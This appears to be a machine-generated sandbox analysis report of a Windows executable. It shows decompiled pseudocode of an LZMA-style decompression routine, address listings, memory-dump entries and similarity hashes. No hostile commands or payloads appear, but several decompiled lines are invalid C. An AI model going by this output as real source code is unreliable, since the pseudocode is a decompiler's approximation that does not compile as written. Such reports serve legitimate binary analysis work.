                              							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                              							goto L149;
                              						case 0x18:
                              							L146:
                              							__eflags =  *(__ebp - 0x6c);
                              							if( *(__ebp - 0x6c) == 0) {
                              								 *(__ebp - 0x88) = 0x18;
                              								goto L170;
                              							}
                              							__ecx =  *(__ebp - 0x70);
                              							__eax =  *(__ebp - 0xc);
                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              							_t484 = __ebp - 0x70;
                              							 *_t484 =  *(__ebp - 0x70) + 1;
                              							__eflags =  *_t484;
                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              							L148:
                              							_t487 = __ebp - 0x48;
                              							 *_t487 =  *(__ebp - 0x48) - 1;
                              							__eflags =  *_t487;
                              							L149:
                              							__eflags =  *(__ebp - 0x48);
                              							if( *(__ebp - 0x48) <= 0) {
                              								__ecx =  *(__ebp - 0x40);
                              								__ebx =  *(__ebp - 0x50);
                              								0 = 1;
                              								__eax = 1 << __cl;
                              								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                              								__eax =  *(__ebp - 0x7c);
                              								 *(__ebp - 0x44) = __ebx;
                              								goto L140;
                              							}
                              							__eax =  *(__ebp - 0x50);
                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                              							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                              							__eax =  *(__ebp - 0x58);
                              							__esi = __edx + __eax;
                              							 *(__ebp - 0x54) = __esi;
                              							__ax =  *__esi;
                              							__edi = __ax & 0x0000ffff;
                              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                              							__eflags =  *(__ebp - 0xc) - __ecx;
                              							if( *(__ebp - 0xc) >= __ecx) {
                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                              								__cx = __ax;
                              								__cx = __ax >> 5;
                              								__eax = __eax - __ecx;
                              								__edx = __edx + 1;
                              								__eflags = __edx;
                              								 *__esi = __ax;
                              								 *(__ebp - 0x50) = __edx;
                              							} else {
                              								 *(__ebp - 0x10) = __ecx;
                              								0x800 = 0x800 - __edi;
                              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                              								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                              								 *__esi = __cx;
                              							}
                              							__eflags =  *(__ebp - 0x10) - 0x1000000;
                              							if( *(__ebp - 0x10) >= 0x1000000) {
                              								goto L148;
                              							} else {
                              								goto L146;
                              							}
                              						case 0x19:
                              							__eflags = __ebx - 4;
                              							if(__ebx < 4) {
                              								 *(__ebp - 0x2c) = __ebx;
                              								L119:
                              								_t393 = __ebp - 0x2c;
                              								 *_t393 =  *(__ebp - 0x2c) + 1;
                              								__eflags =  *_t393;
                              								L120:
                              								__eax =  *(__ebp - 0x2c);
                              								__eflags = __eax;
                              								if(__eax == 0) {
                              									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                              									goto L170;
                              								}
                              								__eflags = __eax -  *(__ebp - 0x60);
                              								if(__eax >  *(__ebp - 0x60)) {
                              									goto L171;
                              								}
                              								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                              								__eax =  *(__ebp - 0x30);
                              								_t400 = __ebp - 0x60;
                              								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                              								__eflags =  *_t400;
                              								goto L123;
                              							}
                              							__ecx = __ebx;
                              							__eax = __ebx;
                              							__ecx = __ebx >> 1;
                              							__eax = __ebx & 0x00000001;
                              							__ecx = (__ebx >> 1) - 1;
                              							__al = __al | 0x00000002;
                              							__eax = (__ebx & 0x00000001) << __cl;
                              							__eflags = __ebx - 0xe;
                              							 *(__ebp - 0x2c) = __eax;
                              							if(__ebx >= 0xe) {
                              								__ebx = 0;
                              								 *(__ebp - 0x48) = __ecx;
                              								L102:
                              								__eflags =  *(__ebp - 0x48);
                              								if( *(__ebp - 0x48) <= 0) {
                              									__eax = __eax + __ebx;
                              									 *(__ebp - 0x40) = 4;
                              									 *(__ebp - 0x2c) = __eax;
                              									__eax =  *(__ebp - 4);
                              									__eax =  *(__ebp - 4) + 0x644;
                              									__eflags = __eax;
                              									L108:
                              									__ebx = 0;
                              									 *(__ebp - 0x58) = __eax;
                              									 *(__ebp - 0x50) = 1;
                              									 *(__ebp - 0x44) = 0;
                              									 *(__ebp - 0x48) = 0;
                              									L112:
                              									__eax =  *(__ebp - 0x40);
                              									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                              									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                              										_t391 = __ebp - 0x2c;
                              										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                              										__eflags =  *_t391;
                              										goto L119;
                              									}
                              									__eax =  *(__ebp - 0x50);
                              									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                              									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                              									__eax =  *(__ebp - 0x58);
                              									__esi = __edi + __eax;
                              									 *(__ebp - 0x54) = __esi;
                              									__ax =  *__esi;
                              									__ecx = __ax & 0x0000ffff;
                              									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                              									__eflags =  *(__ebp - 0xc) - __edx;
                              									if( *(__ebp - 0xc) >= __edx) {
                              										__ecx = 0;
                              										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                              										__ecx = 1;
                              										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                              										__ebx = 1;
                              										__ecx =  *(__ebp - 0x48);
                              										__ebx = 1 << __cl;
                              										__ecx = 1 << __cl;
                              										__ebx =  *(__ebp - 0x44);
                              										__ebx =  *(__ebp - 0x44) | __ecx;
                              										__cx = __ax;
                              										__cx = __ax >> 5;
                              										__eax = __eax - __ecx;
                              										__edi = __edi + 1;
                              										__eflags = __edi;
                              										 *(__ebp - 0x44) = __ebx;
                              										 *__esi = __ax;
                              										 *(__ebp - 0x50) = __edi;
                              									} else {
                              										 *(__ebp - 0x10) = __edx;
                              										0x800 = 0x800 - __ecx;
                              										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                              										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                              										 *__esi = __dx;
                              									}
                              									__eflags =  *(__ebp - 0x10) - 0x1000000;
                              									if( *(__ebp - 0x10) >= 0x1000000) {
                              										L111:
                              										_t368 = __ebp - 0x48;
                              										 *_t368 =  *(__ebp - 0x48) + 1;
                              										__eflags =  *_t368;
                              										goto L112;
                              									} else {
                              										goto L109;
                              									}
                              								}
                              								__ecx =  *(__ebp - 0xc);
                              								__ebx = __ebx + __ebx;
                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                              								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                              								 *(__ebp - 0x44) = __ebx;
                              								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                              									__ecx =  *(__ebp - 0x10);
                              									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                              									__ebx = __ebx | 0x00000001;
                              									__eflags = __ebx;
                              									 *(__ebp - 0x44) = __ebx;
                              								}
                              								__eflags =  *(__ebp - 0x10) - 0x1000000;
                              								if( *(__ebp - 0x10) >= 0x1000000) {
                              									L101:
                              									_t338 = __ebp - 0x48;
                              									 *_t338 =  *(__ebp - 0x48) - 1;
                              									__eflags =  *_t338;
                              									goto L102;
                              								} else {
                              									goto L99;
                              								}
                              							}
                              							__edx =  *(__ebp - 4);
                              							__eax = __eax - __ebx;
                              							 *(__ebp - 0x40) = __ecx;
                              							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                              							goto L108;
                              						case 0x1a:
                              							L56:
                              							__eflags =  *(__ebp - 0x64);
                              							if( *(__ebp - 0x64) == 0) {
                              								 *(__ebp - 0x88) = 0x1a;
                              								goto L170;
                              							}
                              							__ecx =  *(__ebp - 0x68);
                              							__al =  *(__ebp - 0x5c);
                              							__edx =  *(__ebp - 8);
                              							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                              							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                              							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                              							 *( *(__ebp - 0x68)) = __al;
                              							__ecx =  *(__ebp - 0x14);
                              							 *(__ecx +  *(__ebp - 8)) = __al;
                              							__eax = __ecx + 1;
                              							__edx = 0;
                              							_t192 = __eax %  *(__ebp - 0x74);
                              							__eax = __eax /  *(__ebp - 0x74);
                              							__edx = _t192;
                              							goto L79;
                              						case 0x1b:
                              							goto L75;
                              						case 0x1c:
                              							while(1) {
                              								L123:
                              								__eflags =  *(__ebp - 0x64);
                              								if( *(__ebp - 0x64) == 0) {
                              									break;
                              								}
                              								__eax =  *(__ebp - 0x14);
                              								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                              								__eflags = __eax -  *(__ebp - 0x74);
                              								if(__eax >=  *(__ebp - 0x74)) {
                              									__eax = __eax +  *(__ebp - 0x74);
                              									__eflags = __eax;
                              								}
                              								__edx =  *(__ebp - 8);
                              								__cl =  *(__eax + __edx);
                              								__eax =  *(__ebp - 0x14);
                              								 *(__ebp - 0x5c) = __cl;
                              								 *(__eax + __edx) = __cl;
                              								__eax = __eax + 1;
                              								__edx = 0;
                              								_t414 = __eax %  *(__ebp - 0x74);
                              								__eax = __eax /  *(__ebp - 0x74);
                              								__edx = _t414;
                              								__eax =  *(__ebp - 0x68);
                              								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                              								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                              								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                              								__eflags =  *(__ebp - 0x30);
                              								 *( *(__ebp - 0x68)) = __cl;
                              								 *(__ebp - 0x14) = _t414;
                              								if( *(__ebp - 0x30) > 0) {
                              									continue;
                              								} else {
                              									goto L80;
                              								}
                              							}
                              							 *(__ebp - 0x88) = 0x1c;
                              							goto L170;
                              					}
                              				}
                              			}













                              0x0040695b
                              0x00406962
                              0x00406966
                              0x0040696e
                              0x0040696e
                              0x0040696e
                              0x00406968
                              0x00406968
                              0x00406968
                              0x0040695d
                              0x0040695d
                              0x0040695d
                              0x00406972
                              0x00406975
                              0x00406993
                              0x00406995
                              0x00000000
                              0x00406977
                              0x00406977
                              0x0040697a
                              0x0040697d
                              0x00406980
                              0x00406982
                              0x00406982
                              0x00406982
                              0x00406985
                              0x00406988
                              0x0040698a
                              0x0040698b
                              0x0040698e
                              0x00000000
                              0x0040698e
                              0x00000000
                              0x00406bc4
                              0x00406bc8
                              0x00406be6
                              0x00406be9
                              0x00406bf0
                              0x00406bf3
                              0x00406bf6
                              0x00406bf9
                              0x00406bfc
                              0x00406bff
                              0x00406c01
                              0x00406c08
                              0x00406c09
                              0x00406c0b
                              0x00406c0e
                              0x00406c11
                              0x00406c14
                              0x00406c14
                              0x00406c19
                              0x00000000
                              0x00406c19
                              0x00406bca
                              0x00406bcd
                              0x00406bd0
                              0x00406bda
                              0x00000000
                              0x00000000
                              0x00406c2e
                              0x00406c32
                              0x00406c55
                              0x00406c58
                              0x00406c5b
                              0x00406c65
                              0x00406c34
                              0x00406c34
                              0x00406c37
                              0x00406c3a
                              0x00406c3d
                              0x00406c4a
                              0x00406c4d
                              0x00406c4d
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00406ce2
                              0x00406ce6
                              0x00406ced
                              0x00406cf0
                              0x00406cf3
                              0x00406cfd
                              0x00000000
                              0x00406cfd
                              0x00406ce8
                              0x00000000
                              0x00000000
                              0x00406d09
                              0x00406d0d
                              0x00406d14
                              0x00406d17
                              0x00406d1a
                              0x00406d0f
                              0x00406d0f
                              0x00406d0f
                              0x00406d1d
                              0x00406d20
                              0x00406d23
                              0x00406d23
                              0x00406d26
                              0x00406d29
                              0x00000000
                              0x00000000
                              0x00406dc9
                              0x00406dc9
                              0x00406dcd
                              0x0040716b
                              0x00000000
                              0x0040716b
                              0x00406dd3
                              0x00406dd6
                              0x00406dd9
                              0x00406ddd
                              0x00406de0
                              0x00406de6
                              0x00406de8
                              0x00406de8
                              0x00406de8
                              0x00406deb
                              0x00406dee
                              0x00000000
                              0x00000000
                              0x004069be
                              0x004069be
                              0x004069c2
                              0x0040712f
                              0x00000000
                              0x0040712f
                              0x004069c8
                              0x004069cb
                              0x004069ce
                              0x004069d2
                              0x004069d5
                              0x004069db
                              0x004069dd
                              0x004069dd
                              0x004069dd
                              0x004069e0
                              0x004069e3
                              0x004069e3
                              0x004069e6
                              0x004069e9
                              0x00000000
                              0x00000000
                              0x004069ef
                              0x004069f5
                              0x00000000
                              0x00000000
                              0x004069fb
                              0x004069fb
                              0x004069ff
                              0x00406a02
                              0x00406a05
                              0x00406a08
                              0x00406a0b
                              0x00406a0c
                              0x00406a0f
                              0x00406a11
                              0x00406a17
                              0x00406a1a
                              0x00406a1d
                              0x00406a20
                              0x00406a23
                              0x00406a26
                              0x00406a29
                              0x00406a45
                              0x00406a48
                              0x00406a4b
                              0x00406a4e
                              0x00406a55
                              0x00406a59
                              0x00406a5b
                              0x00406a5f
                              0x00406a2b
                              0x00406a2b
                              0x00406a2f
                              0x00406a37
                              0x00406a3c
                              0x00406a3e
                              0x00406a40
                              0x00406a40
                              0x00406a62
                              0x00406a69
                              0x00406a6c
                              0x00000000
                              0x00406a72
                              0x00000000
                              0x00406a72
                              0x00000000
                              0x00406a77
                              0x00406a77
                              0x00406a7b
                              0x0040713b
                              0x00000000
                              0x0040713b
                              0x00406a81
                              0x00406a84
                              0x00406a87
                              0x00406a8b
                              0x00406a8e
                              0x00406a94
                              0x00406a96
                              0x00406a96
                              0x00406a96
                              0x00406a99
                              0x00406a9c
                              0x00406a9c
                              0x00406a9c
                              0x00406aa2
                              0x00000000
                              0x00000000
                              0x00406aa4
                              0x00406aa7
                              0x00406aaa
                              0x00406aad
                              0x00406ab0
                              0x00406ab3
                              0x00406ab6
                              0x00406ab9
                              0x00406abc
                              0x00406abf
                              0x00406ac2
                              0x00406ada
                              0x00406add
                              0x00406ae0
                              0x00406ae3
                              0x00406ae3
                              0x00406ae6
                              0x00406aea
                              0x00406aec
                              0x00406ac4
                              0x00406ac4
                              0x00406acc
                              0x00406ad1
                              0x00406ad3
                              0x00406ad5
                              0x00406ad5
                              0x00406aef
                              0x00406af6
                              0x00406af9
                              0x00000000
                              0x00406afb
                              0x00000000
                              0x00406afb
                              0x00406af9
                              0x00406b00
                              0x00406b00
                              0x00406b00
                              0x00406b00
                              0x00000000
                              0x00000000
                              0x00406b3b
                              0x00406b3b
                              0x00406b3f
                              0x00407147
                              0x00000000
                              0x00407147
                              0x00406b45
                              0x00406b48
                              0x00406b4b
                              0x00406b4f
                              0x00406b52
                              0x00406b58
                              0x00406b5a
                              0x00406b5a
                              0x00406b5a
                              0x00406b5d
                              0x00406b60
                              0x00406b60
                              0x00406b66
                              0x00406b04
                              0x00406b04
                              0x00406b07
                              0x00000000
                              0x00406b07
                              0x00406b68
                              0x00406b68
                              0x00406b6b
                              0x00406b6e
                              0x00406b71
                              0x00406b74
                              0x00406b77
                              0x00406b7a
                              0x00406b7d
                              0x00406b80
                              0x00406b83
                              0x00406b86
                              0x00406b9e
                              0x00406ba1
                              0x00406ba4
                              0x00406ba7
                              0x00406ba7
                              0x00406baa
                              0x00406bae
                              0x00406bb0
                              0x00406b88
                              0x00406b88
                              0x00406b90
                              0x00406b95
                              0x00406b97
                              0x00406b99
                              0x00406b99
                              0x00406bb3
                              0x00406bba
                              0x00406bbd
                              0x00000000
                              0x00406bbf
                              0x00000000
                              0x00406bbf
                              0x00000000
                              0x00406e4c
                              0x00406e4c
                              0x00406e50
                              0x00407177
                              0x00000000
                              0x00407177
                              0x00406e56
                              0x00406e59
                              0x00406e5c
                              0x00406e60
                              0x00406e63
                              0x00406e69
                              0x00406e6b
                              0x00406e6b
                              0x00406e6b
                              0x00406e6e
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00406f5b
                              0x00406f5f
                              0x00406f81
                              0x00406f84
                              0x00406f8e
                              0x00000000
                              0x00406f8e
                              0x00406f61
                              0x00406f64
                              0x00406f68
                              0x00406f6b
                              0x00406f6b
                              0x00406f6e
                              0x00000000
                              0x00000000
                              0x00407018
                              0x0040701c
                              0x0040703a
                              0x0040703a
                              0x0040703a
                              0x00407041
                              0x00407048
                              0x0040704f
                              0x0040704f
                              0x00000000
                              0x0040704f
                              0x0040701e
                              0x00407021
                              0x00407024
                              0x00407027
                              0x0040702e
                              0x00406f72
                              0x00406f72
                              0x00406f75
                              0x00000000
                              0x00000000
                              0x00407109
                              0x0040710c
                              0x00000000
                              0x00000000
                              0x00406d43
                              0x00406d45
                              0x00406d4c
                              0x00406d4d
                              0x00406d4f
                              0x00406d52
                              0x00000000
                              0x00000000
                              0x00406d5a
                              0x00406d5d
                              0x00406d60
                              0x00406d62
                              0x00406d64
                              0x00406d64
                              0x00406d65
                              0x00406d68
                              0x00406d6f
                              0x00406d72
                              0x00406d80
                              0x00000000
                              0x00000000
                              0x00407056
                              0x00407056
                              0x00407059
                              0x00407060
                              0x00000000
                              0x00000000
                              0x00407065
                              0x00407065
                              0x00407069
                              0x004071a1
                              0x00000000
                              0x004071a1
                              0x0040706f
                              0x00407072
                              0x00407075
                              0x00407079
                              0x0040707c
                              0x00407082
                              0x00407084
                              0x00407084
                              0x00407084
                              0x00407087
                              0x0040708a
                              0x0040708a
                              0x0040708a
                              0x0040708a
                              0x0040708d
                              0x0040708d
                              0x00407091
                              0x004070f1
                              0x004070f4
                              0x004070f9
                              0x004070fa
                              0x004070fc
                              0x004070fe
                              0x00407101
                              0x00000000
                              0x00407101
                              0x00407093
                              0x00407099
                              0x0040709c
                              0x0040709f
                              0x004070a2
                              0x004070a5
                              0x004070a8
                              0x004070ab
                              0x004070ae
                              0x004070b1
                              0x004070b4
                              0x004070cd
                              0x004070d0
                              0x004070d3
                              0x004070d6
                              0x004070da
                              0x004070dc
                              0x004070dc
                              0x004070dd
                              0x004070e0
                              0x004070b6
                              0x004070b6
                              0x004070be
                              0x004070c3
                              0x004070c5
                              0x004070c8
                              0x004070c8
                              0x004070e3
                              0x004070ea
                              0x00000000
                              0x004070ec
                              0x00000000
                              0x004070ec
                              0x00000000
                              0x00406d88
                              0x00406d8b
                              0x00406dc1
                              0x00406ef1
                              0x00406ef1
                              0x00406ef1
                              0x00406ef1
                              0x00406ef4
                              0x00406ef4
                              0x00406ef7
                              0x00406ef9
                              0x00407183
                              0x00000000
                              0x00407183
                              0x00406eff
                              0x00406f02
                              0x00000000
                              0x00000000
                              0x00406f08
                              0x00406f0c
                              0x00406f0f
                              0x00406f0f
                              0x00406f0f
                              0x00000000
                              0x00406f0f
                              0x00406d8d
                              0x00406d8f
                              0x00406d91
                              0x00406d93
                              0x00406d96
                              0x00406d97
                              0x00406d99
                              0x00406d9b
                              0x00406d9e
                              0x00406da1
                              0x00406db7
                              0x00406dbc
                              0x00406df4
                              0x00406df4
                              0x00406df8
                              0x00406e24
                              0x00406e26
                              0x00406e2d
                              0x00406e30
                              0x00406e33
                              0x00406e33
                              0x00406e38
                              0x00406e38
                              0x00406e3a
                              0x00406e3d
                              0x00406e44
                              0x00406e47
                              0x00406e74
                              0x00406e74
                              0x00406e77
                              0x00406e7a
                              0x00406eee
                              0x00406eee
                              0x00406eee
                              0x00000000
                              0x00406eee
                              0x00406e7c
                              0x00406e82
                              0x00406e85
                              0x00406e88
                              0x00406e8b
                              0x00406e8e
                              0x00406e91
                              0x00406e94
                              0x00406e97
                              0x00406e9a
                              0x00406e9d
                              0x00406eb6
                              0x00406eb8
                              0x00406ebb
                              0x00406ebc
                              0x00406ebf
                              0x00406ec1
                              0x00406ec4
                              0x00406ec6
                              0x00406ec8
                              0x00406ecb
                              0x00406ecd
                              0x00406ed0
                              0x00406ed4
                              0x00406ed6
                              0x00406ed6
                              0x00406ed7
                              0x00406eda
                              0x00406edd
                              0x00406e9f
                              0x00406e9f
                              0x00406ea7
                              0x00406eac
                              0x00406eae
                              0x00406eb1
                              0x00406eb1
                              0x00406ee0
                              0x00406ee7
                              0x00406e71
                              0x00406e71
                              0x00406e71
                              0x00406e71
                              0x00000000
                              0x00406ee9
                              0x00000000
                              0x00406ee9
                              0x00406ee7
                              0x00406dfa
                              0x00406dfd
                              0x00406dff
                              0x00406e02
                              0x00406e05
                              0x00406e08
                              0x00406e0a
                              0x00406e0d
                              0x00406e10
                              0x00406e10
                              0x00406e13
                              0x00406e13
                              0x00406e16
                              0x00406e1d
                              0x00406df1
                              0x00406df1
                              0x00406df1
                              0x00406df1
                              0x00000000
                              0x00406e1f
                              0x00000000
                              0x00406e1f
                              0x00406e1d
                              0x00406da3
                              0x00406da6
                              0x00406da8
                              0x00406dab
                              0x00000000
                              0x00000000
                              0x00406b0a
                              0x00406b0a
                              0x00406b0e
                              0x00407153
                              0x00000000
                              0x00407153
                              0x00406b14
                              0x00406b17
                              0x00406b1a
                              0x00406b1d
                              0x00406b20
                              0x00406b23
                              0x00406b26
                              0x00406b28
                              0x00406b2b
                              0x00406b2e
                              0x00406b31
                              0x00406b33
                              0x00406b33
                              0x00406b33
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00406f12
                              0x00406f12
                              0x00406f12
                              0x00406f16
                              0x00000000
                              0x00000000
                              0x00406f1c
                              0x00406f1f
                              0x00406f22
                              0x00406f25
                              0x00406f27
                              0x00406f27
                              0x00406f27
                              0x00406f2a
                              0x00406f2d
                              0x00406f30
                              0x00406f33
                              0x00406f36
                              0x00406f39
                              0x00406f3a
                              0x00406f3c
                              0x00406f3c
                              0x00406f3c
                              0x00406f3f
                              0x00406f42
                              0x00406f45
                              0x00406f48
                              0x00406f4b
                              0x00406f4f
                              0x00406f51
                              0x00406f54
                              0x00000000
                              0x00406f56
                              0x00000000
                              0x00406f56
                              0x00406f54
                              0x00407189
                              0x00000000
                              0x00000000
                              0x004067b8

                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b03ad86bf6e5db825a161e7c2c9863a2c6e055a2fa0602cea3b48f6a3cf4a0c0
                              • Instruction ID: 7a557209975026f945a3d96698a9d3e809275b90a73cce2131b371529b247a98
                              • Opcode Fuzzy Hash: b03ad86bf6e5db825a161e7c2c9863a2c6e055a2fa0602cea3b48f6a3cf4a0c0
                              • Instruction Fuzzy Hash: 0F813471D04228CFDF24CFA8C884BADBBB1FB44305F25816AD456BB281C778A996DF45
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 98%
                              			E00406776(void* __ecx) {
                              				void* _v8;
                              				void* _v12;
                              				signed int _v16;
                              				unsigned int _v20;
                              				signed int _v24;
                              				signed int _v28;
                              				signed int _v32;
                              				signed int _v36;
                              				signed int _v40;
                              				signed int _v44;
                              				signed int _v48;
                              				signed int _v52;
                              				signed int _v56;
                              				signed int _v60;
                              				signed int _v64;
                              				signed int _v68;
                              				signed int _v72;
                              				signed int _v76;
                              				signed int _v80;
                              				signed int _v84;
                              				signed int _v88;
                              				signed int _v92;
                              				signed int _v95;
                              				signed int _v96;
                              				signed int _v100;
                              				signed int _v104;
                              				signed int _v108;
                              				signed int _v112;
                              				signed int _v116;
                              				signed int _v120;
                              				intOrPtr _v124;
                              				signed int _v128;
                              				signed int _v132;
                              				signed int _v136;
                              				void _v140;
                              				void* _v148;
                              				signed int _t537;
                              				signed int _t538;
                              				signed int _t572;
                              
                              				_t572 = 0x22;
                              				_v148 = __ecx;
                              				memcpy( &_v140, __ecx, _t572 << 2);
                              				if(_v52 == 0xffffffff) {
                              					return 1;
                              				}
                              				while(1) {
                              					L3:
                              					_t537 = _v140;
                              					if(_t537 > 0x1c) {
                              						break;
                              					}
                              					switch( *((intOrPtr*)(_t537 * 4 +  &M004071C8))) {
                              						case 0:
                              							__eflags = _v112;
                              							if(_v112 == 0) {
                              								goto L173;
                              							}
                              							_v112 = _v112 - 1;
                              							_v116 = _v116 + 1;
                              							_t537 =  *_v116;
                              							__eflags = _t537 - 0xe1;
                              							if(_t537 > 0xe1) {
                              								goto L174;
                              							}
                              							_t542 = _t537 & 0x000000ff;
                              							_push(0x2d);
                              							asm("cdq");
                              							_pop(_t576);
                              							_push(9);
                              							_pop(_t577);
                              							_t622 = _t542 / _t576;
                              							_t544 = _t542 % _t576 & 0x000000ff;
                              							asm("cdq");
                              							_t617 = _t544 % _t577 & 0x000000ff;
                              							_v64 = _t617;
                              							_v32 = (1 << _t622) - 1;
                              							_v28 = (1 << _t544 / _t577) - 1;
                              							_t625 = (0x300 << _t617 + _t622) + 0x736;
                              							__eflags = 0x600 - _v124;
                              							if(0x600 == _v124) {
                              								L12:
                              								__eflags = _t625;
                              								if(_t625 == 0) {
                              									L14:
                              									_v76 = _v76 & 0x00000000;
                              									_v68 = _v68 & 0x00000000;
                              									goto L17;
                              								} else {
                              									goto L13;
                              								}
                              								do {
                              									L13:
                              									_t625 = _t625 - 1;
                              									__eflags = _t625;
                              									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                              								} while (_t625 != 0);
                              								goto L14;
                              							}
                              							__eflags = _v8;
                              							if(_v8 != 0) {
                              								GlobalFree(_v8);
                              							}
                              							_t537 = GlobalAlloc(0x40, 0x600); // executed
                              							__eflags = _t537;
                              							_v8 = _t537;
                              							if(_t537 == 0) {
                              								goto L174;
                              							} else {
                              								_v124 = 0x600;
                              								goto L12;
                              							}
                              						case 1:
                              							L15:
                              							__eflags = _v112;
                              							if(_v112 == 0) {
                              								_v140 = 1;
                              								goto L173;
                              							}
                              							_v112 = _v112 - 1;
                              							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                              							_v116 = _v116 + 1;
                              							_t50 =  &_v76;
                              							 *_t50 = _v76 + 1;
                              							__eflags =  *_t50;
                              							L17:
                              							__eflags = _v76 - 4;
                              							if(_v76 < 4) {
                              								goto L15;
                              							}
                              							_t550 = _v68;
                              							__eflags = _t550 - _v120;
                              							if(_t550 == _v120) {
                              								L22:
                              								_v76 = 5;
                              								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                              								goto L25;
                              							}
                              							__eflags = _v12;
                              							_v120 = _t550;
                              							if(_v12 != 0) {
                              								GlobalFree(_v12);
                              							}
                              							_t537 = GlobalAlloc(0x40, _v68); // executed
                              							__eflags = _t537;
                              							_v12 = _t537;
                              							if(_t537 == 0) {
                              								goto L174;
                              							} else {
                              								goto L22;
                              							}
                              						case 2:
                              							L26:
                              							_t557 = _v100 & _v32;
                              							_v136 = 6;
                              							_v80 = _t557;
                              							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                              							goto L135;
                              						case 3:
                              							L23:
                              							__eflags = _v112;
                              							if(_v112 == 0) {
                              								_v140 = 3;
                              								goto L173;
                              							}
                              							_v112 = _v112 - 1;
                              							_t72 =  &_v116;
                              							 *_t72 = _v116 + 1;
                              							__eflags =  *_t72;
                              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                              							L25:
                              							_v76 = _v76 - 1;
                              							__eflags = _v76;
                              							if(_v76 != 0) {
                              								goto L23;
                              							}
                              							goto L26;
                              						case 4:
                              							L136:
                              							_t559 =  *_t626;
                              							_t610 = _t559 & 0x0000ffff;
                              							_t591 = (_v20 >> 0xb) * _t610;
                              							__eflags = _v16 - _t591;
                              							if(_v16 >= _t591) {
                              								_v20 = _v20 - _t591;
                              								_v16 = _v16 - _t591;
                              								_v68 = 1;
                              								_t560 = _t559 - (_t559 >> 5);
                              								__eflags = _t560;
                              								 *_t626 = _t560;
                              							} else {
                              								_v20 = _t591;
                              								_v68 = _v68 & 0x00000000;
                              								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                              							}
                              							__eflags = _v20 - 0x1000000;
                              							if(_v20 >= 0x1000000) {
                              								goto L142;
                              							} else {
                              								goto L140;
                              							}
                              						case 5:
                              							L140:
                              							__eflags = _v112;
                              							if(_v112 == 0) {
                              								_v140 = 5;
                              								goto L173;
                              							}
                              							_v20 = _v20 << 8;
                              							_v112 = _v112 - 1;
                              							_t464 =  &_v116;
                              							 *_t464 = _v116 + 1;
                              							__eflags =  *_t464;
                              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                              							L142:
                              							_t561 = _v136;
                              							goto L143;
                              						case 6:
                              							__edx = 0;
                              							__eflags = _v68;
                              							if(_v68 != 0) {
                              								__eax = _v8;
                              								__ecx = _v60;
                              								_v56 = 1;
                              								_v136 = 7;
